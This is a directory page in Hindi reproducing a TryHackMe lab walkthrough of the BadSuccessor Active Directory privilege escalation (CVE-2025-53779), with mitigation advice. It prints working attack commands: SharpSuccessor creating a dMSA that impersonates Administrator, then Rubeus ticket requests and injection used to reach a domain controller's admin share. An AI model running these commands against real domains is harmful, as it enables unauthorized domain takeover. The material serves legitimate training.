Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Active-Directory-BadSuccessor — Windows का उपयोग करके CVE-2025-53779 के शोषण को कवर करने वाला एक TryHackme कमरा। | Kitploit
उपकरण/GitHubGitHub/musa-xvi/active-directory-badsuccessor
विशेषाधिकार वृद्धिटोहीशोषणपोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubmusa-xvi/active-directory-badsuccessor

Active-Directory-BadSuccessor

Windows का उपयोग करके CVE-2025-53779 के शोषण को कवर करने वाला एक TryHackme कमरा।

रिपॉजिटरी देखें
133 महीने पहलेअभी तक समीक्षित नहीं

Active-Directory-BadSuccessor

अवलोकन

इस रूम में, हम BadSuccessor विशेषाधिकार वृद्धि तकनीक का पता लगाते हैं, जो Active Directory में प्रत्यायोजित प्रबंधित सेवा खातों (delegated Managed Service Accounts) का दुरुपयोग करने वाली एक कमजोरी है। यह हमला एक उपयोगकर्ता को dMSA ऑब्जेक्ट पर पर्याप्त नियंत्रण रखते हुए किसी अन्य खाते का रूप धारण करने और संभावित रूप से Domain Administrator विशेषाधिकार प्राप्त करने की अनुमति देता है।

रूम जानकारी

रूम: https://tryhackme.com/room/adbadsuccessor

कठिनाई स्तर: मध्यम

दिनांक: 05/06/2026

संस्करण: 1.0

उद्देश्य: यह प्रदर्शित करना कि प्रत्यायोजित प्रबंधित सेवा खातों का दुरुपयोग करके विशेषाधिकारों को बढ़ाया जा सकता है और Active Directory वातावरण से समझौता किया जा सकता है।

भूमिका: Terry Byte (tbyte)

लक्ष्य: नव परिनियोजित Active Directory वातावरण की सुरक्षा का आकलन करना और यह निर्धारित करना कि क्या यह BadSuccessor हमले के प्रति संवेदनशील है।

हमले का मार्ग

इस हमले में दो मुख्य चरण होते हैं:

  1. रीकॉनिसांस।
  2. dMSA दुरुपयोग के माध्यम से विशेषाधिकार वृद्धि

रीकॉनिसांस

चरण 1 - लक्ष्य मशीन से कनेक्ट करें

  • प्रदान किए गए Windows वर्कस्टेशन से RDP का उपयोग करके कनेक्ट करें:
xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
  • प्रमाणीकरण के बाद, PowerShell खोलें।

चरण 2 - कार्यशील निर्देशिका पर जाएँ

  • Proof-of-Concept निर्देशिका में जाएँ:

    cd C:\PoC
    
  • सामग्री सत्यापित करें: dir

navigate_directory

चरण 3 - एन्यूमरेशन स्क्रिप्ट प्राप्त करें

  • PowerShell स्क्रिप्ट को Akamai के BadSuccessor रिपॉजिटरी से डाउनलोड करें:
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
  • स्क्रिप्ट को Notepad का उपयोग करके बनाएँ या संपादित करें:

notepad Get-BadSuccessorOUPermissions.ps1

  • सामग्री चिपकाएँ और फ़ाइल सहेजें।
edit_script

चरण 4 - OU अनुमतियों की एन्यूमरेट करें

  • स्क्रिप्ट निष्पादित करें:
 .\Get-BadSuccessorOUPermissions.ps1
enumerate_script
  • आउटपुट उन खातों को दर्शाता है जिनके पास ऐसी अनुमतियाँ हैं जो संभावित रूप से प्रत्यायोजित प्रबंधित सेवा खातों का दुरुपयोग कर सकती हैं।
  • स्क्रिप्ट द्वारा लौटाए गए तीसरे खाते की पहचान करें।
  • इस खाते का उपयोग विशेषाधिकार वृद्धि चरण के दौरान किया जाएगा।

Windows का उपयोग करके शोषण

चरण 1 - एक दुर्भावनापूर्ण dMSA बनाएँ

  • Administrator खाते का रूप धारण करने वाला एक प्रत्यायोजित प्रबंधित सेवा खाता बनाने के लिए SharpSuccessor का उपयोग करें:

    .\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
    
    malicious_dMSA

क्या होता है?

  • यह टूल एक नया dMSA ऑब्जेक्ट बनाता है और इसे Administrator खाते का उत्तराधिकारी बनने के लिए कॉन्फ़िगर करता है।
  • यह विशेषाधिकार वृद्धि के लिए आधार तैयार करता है।

चरण 2 - Kerberos TGT का अनुरोध करें

  • एक प्रत्यायोजित टिकट ग्रांटिंग टिकट (TGT) प्राप्त करने के लिए Rubeus का उपयोग करें:

    .\Rubeus.exe tgtdeleg /nowrap
    
    Kerberos TGT
  • यह कमांड एक Base64-एन्कोडेड Kerberos टिकट लौटाता है।

  • उत्पन्न टिकट कॉपी करें।

चरण 3 - dMSA खाते का रूप धारण करें

  • नव निर्मित dMSA खाते के रूप में टिकट का अनुरोध करने के लिए प्रत्यायोजित TGT का उपयोग करें:
 .\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
dMSA_Account

परिणाम:

नया Kerberos टिकट dMSA खाते के लिए मेमोरी में इंजेक्ट किया जाता है।

चरण 4 - Administrator के रूप में एक सेवा टिकट का अनुरोध करें

  • Administrator संदर्भ में चल रही सेवाओं तक पहुँच प्राप्त करने के लिए dMSA टिकट का लाभ उठाएँ:

    .\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
    
    Admin-ticket

परिणाम:

  • एक CIFS सेवा टिकट मेमोरी में लोड किया जाता है।
  • यह टिकट उन संसाधनों तक पहुँच प्रदान करता है जिनके लिए सामान्यतः Domain Administrator विशेषाधिकारों की आवश्यकता होती है।

चरण 5 - Administrator डेस्कटॉप तक पहुँचें

  • Domain Controller पर Administrator प्रोफ़ाइल को ब्राउज़ करके बढ़ी हुई पहुँच सत्यापित करें:
 dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
malicious_dMSA
  • सफल निर्देशिका सूचीकरण प्रशासनिक-स्तर की पहुँच की पुष्टि करता है।

चरण 6 - फ्लैग प्राप्त करें

  • Administrator डेस्कटॉप पर संग्रहीत फ्लैग पढ़ें:

    Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
    
    Flag
  • फ्लैग सफलतापूर्वक प्राप्त हो गया।

BadSuccessor क्यों महत्वपूर्ण है

BadSuccessor दर्शाता है कि प्रत्यायोजित प्रबंधित सेवा खाते Active Directory वातावरण में विशेषाधिकार वृद्धि के मार्ग कैसे प्रस्तुत कर सकते हैं। Active Directory कई संगठनों के लिए पहचान की रीढ़ के रूप में कार्य करता है; Kerberos और खाता प्रत्यायोजन को प्रभावित करने वाली कमजोरियों के गंभीर परिणाम हो सकते हैं।

एक हमलावर जिसके पास dMSA ऑब्जेक्ट पर पर्याप्त अनुमतियाँ हैं, वह निम्न कार्य कर सकता है:

  • विशेषाधिकार प्राप्त उपयोगकर्ताओं का रूप धारण करना
  • बढ़े हुए विशेषाधिकार वाले Kerberos टिकट प्राप्त करना
  • संवेदनशील संसाधनों तक पहुँचना
  • Domain Administrator तक विशेषाधिकार बढ़ाना
  • संपूर्ण Active Directory फ़ॉरेस्ट से संभावित रूप से समझौता करना

न्यूनीकरण अनुशंसाएँ

BadSuccessor (CVE-2025-53779) को कम करने के लिए, संगठनों को तुरंत Microsoft के सुरक्षा अपडेट लागू करने चाहिए, dMSA अनुमतियों को प्रतिबंधित और समीक्षित करना चाहिए, संदिग्ध Kerberos गतिविधि की निगरानी करनी चाहिए, प्रत्यायोजन संबंधों का ऑडिट करना चाहिए, और न्यूनतम विशेषाधिकार के सिद्धांत को लागू करना चाहिए। Active Directory प्रत्यायोजन सेटिंग्स की नियमित समीक्षा संभावित विशेषाधिकार वृद्धि मार्गों की पहचान करने और उन्हें कम करने में मदद कर सकती है।

मुख्य निष्कर्ष

इस रूम ने निम्नलिखित के साथ मूल्यवान व्यावहारिक अनुभव प्रदान किया:

  • Active Directory विशेषाधिकार वृद्धि
  • प्रत्यायोजित प्रबंधित सेवा खाते (dMSAs)
  • Kerberos प्रमाणीकरण का दुरुपयोग
  • Rubeus टिकट संचालन
  • SharpSuccessor शोषण
  • पोस्ट-एक्सप्लॉयटेशन सत्यापन तकनीकें
टूल डाउनलोड करें